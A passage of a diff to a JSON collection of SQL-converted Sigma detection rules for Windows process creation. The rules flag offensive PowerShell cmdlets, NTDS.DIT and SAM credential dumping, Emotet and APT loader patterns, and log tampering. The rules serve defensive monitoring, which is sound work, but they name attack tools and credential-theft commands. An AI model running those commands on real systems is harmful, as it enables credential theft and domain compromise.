ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" + "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" }, { - "title": "Download Arbitrary Files Via PresentationHost.exe", - "id": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", + "title": "Service Security Descriptor Tampering Via Sc.EXE", + "id": "98c5aeef-32d5-492f-b174-64a691896d25", "status": "experimental", - "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", + "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND CommandLine LIKE '%sdset%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_presentationhost_download.yml" + "filename": "proc_creation_win_sc_sdset_modification.yml" }, { - "title": "GALLIUM IOCs", - "id": "440a56bf-7873-4439-940a-1c8a671073c2", + "title": "MSHTA Suspicious Execution 01", + "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", "status": "test", - "description": "Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.", - "author": "Tim Burrell", + "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", + "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", "tags": [ - "attack.credential_access", - "attack.command_and_control", - "attack.t1212", - "attack.t1071", - "attack.g0093" + "attack.defense_evasion", + "attack.t1140", + "attack.t1218.005", + "attack.execution", + "attack.t1059.007", + "cve.2020.1599" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Hashes LIKE '%SHA256=9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29%' ESCAPE '\\' OR Hashes LIKE '%SHA256=52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945%' ESCAPE '\\' OR Hashes LIKE '%SHA256=51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79%' ESCAPE '\\' OR Hashes LIKE '%SHA256=332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08%' ESCAPE '\\' OR Hashes LIKE '%SHA256=63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef%' ESCAPE '\\' OR Hashes LIKE '%SHA256=056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53a44c2396d15c3a03723fa5e5db54cafd527635%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c5e496921e3bc882dc40694f1dcc3746a75db19%' ESCAPE '\\' OR Hashes LIKE '%SHA1=aeb573accfd95758550cf30bf04f389a92922844%' ESCAPE '\\' OR Hashes LIKE '%SHA1=79ef78a797403a4ed1a616c68e07fff868a8650a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4f6f38b4cec35e895d91c052b1f5a83d665c2196%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e841a63e47361a572db9a7334af459ddca11347a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c28f606df28a9bc8df75a4d5e5837fc5522dd34d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e94b305d6812a9f96e6781c888e48c7fb157b6b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dd44133716b8a241957b912fa6a02efde3ce3025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8793bf166cb89eb55f0593404e4e933ab605e803%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a39b57032dbb2335499a51e13470a7cd5d86b138%' ESCAPE '\\' OR Hashes LIKE '%SHA1=41cc2b15c662bc001c0eb92f6cc222934f0beeea%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d209430d6af54792371174e70e27dd11d3def7a7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1c6452026c56efd2c94cea7e0f671eb55515edb0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6b41d3afdcdcaf9f442bbe772f5da871801fd5a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4923d460e22fbbf165bbbaba168e5a46b8157d9f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f201504bd96e81d0d350c3a8332593ee1c9e09de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddd2db1127632a2a52943a2fe516a2e7d05d70d2%' ESCAPE '\\') OR sha256 IN ('9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd', '7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b', '657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5', '2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29', '52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77', 'a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3', '5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022', '6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883', '3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e', '1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7', 'fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1', '7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c', '178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945', '51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9', '889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79', '332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf', '44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08', '63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef', '056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070') OR sha1 IN ('53a44c2396d15c3a03723fa5e5db54cafd527635', '9c5e496921e3bc882dc40694f1dcc3746a75db19', 'aeb573accfd95758550cf30bf04f389a92922844', '79ef78a797403a4ed1a616c68e07fff868a8650a', '4f6f38b4cec35e895d91c052b1f5a83d665c2196', '1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d', 'e841a63e47361a572db9a7334af459ddca11347a', 'c28f606df28a9bc8df75a4d5e5837fc5522dd34d', '2e94b305d6812a9f96e6781c888e48c7fb157b6b', 'dd44133716b8a241957b912fa6a02efde3ce3025', '8793bf166cb89eb55f0593404e4e933ab605e803', 'a39b57032dbb2335499a51e13470a7cd5d86b138', '41cc2b15c662bc001c0eb92f6cc222934f0beeea', 'd209430d6af54792371174e70e27dd11d3def7a7', '1c6452026c56efd2c94cea7e0f671eb55515edb0', 'c6b41d3afdcdcaf9f442bbe772f5da871801fd5a', '4923d460e22fbbf165bbbaba168e5a46b8157d9f', 'f201504bd96e81d0d350c3a8332593ee1c9e09de', 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_gallium_iocs.yml" + "filename": "proc_creation_win_mshta_susp_execution.yml" }, { - "title": "Suspicious Workstation Locking via Rundll32", - "id": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", - "status": "experimental", - "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", - "author": "frack113", + "title": "Suspicious Csc.exe Source File Folder", + "id": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", + "status": "test", + "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. AppData)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1027.004" ], "falsepositives": [ - "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" + "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897", + "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%user32.dll,%' ESCAPE '\\' AND CommandLine LIKE '%LockWorkStation%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\choco.exe' ESCAPE '\\') OR ParentCommandLine LIKE '%\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_user32_dll.yml" + "filename": "proc_creation_win_csc_susp_folder.yml" }, { - "title": "Suspicious CustomShellHost Execution", - "id": "84b14121-9d14-416e-800b-f3b829c5a14d", - "status": "experimental", - "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Sofacy Trojan Loader Activity", + "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "status": "test", + "description": "Detects Trojan loader activity as used by APT28", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.g0007", + "attack.execution", + "attack.t1059.003", "attack.defense_evasion", - "attack.t1216" + "car.2013-10-002", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\CustomShellHost.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_customshellhost.yml" + "filename": "proc_creation_win_apt_sofacy.yml" }, { - "title": "Suspicious Process Patterns NTDS.DIT Exfil", - "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", + "title": "Suspicious NTLM Authentication on the Printer Spooler Service", + "id": "bb76d96b-821c-47cf-944b-7ce377864492", "status": "experimental", - "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", + "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", "tags": [ + "attack.privilege_escalation", "attack.credential_access", - "attack.t1003.003" + "attack.t1212" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_ntds.yml" + "filename": "proc_creation_win_rundll32_ntlmrelay.yml" }, { - "title": "Potential Emotet Rundll32 Execution", - "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", - "status": "test", - "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", - "author": "FPT.EagleEye", + "title": "HackTool - SharpEvtMute Execution", + "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "status": "experimental", + "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\tracker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" + "filename": "proc_creation_win_hktl_sharpevtmute.yml" }, { - "title": "Lazarus Group Activity", - "id": "24c4d154-05a4-4b99-b57d-9b977472443a", - "status": "test", - "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", - "author": "Florian Roth (Nextron Systems), wagga", + "title": "Suspicious Rundll32 Execution With Image Extension", + "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", + "status": "experimental", + "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", + "author": "Hieu Tran", "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND 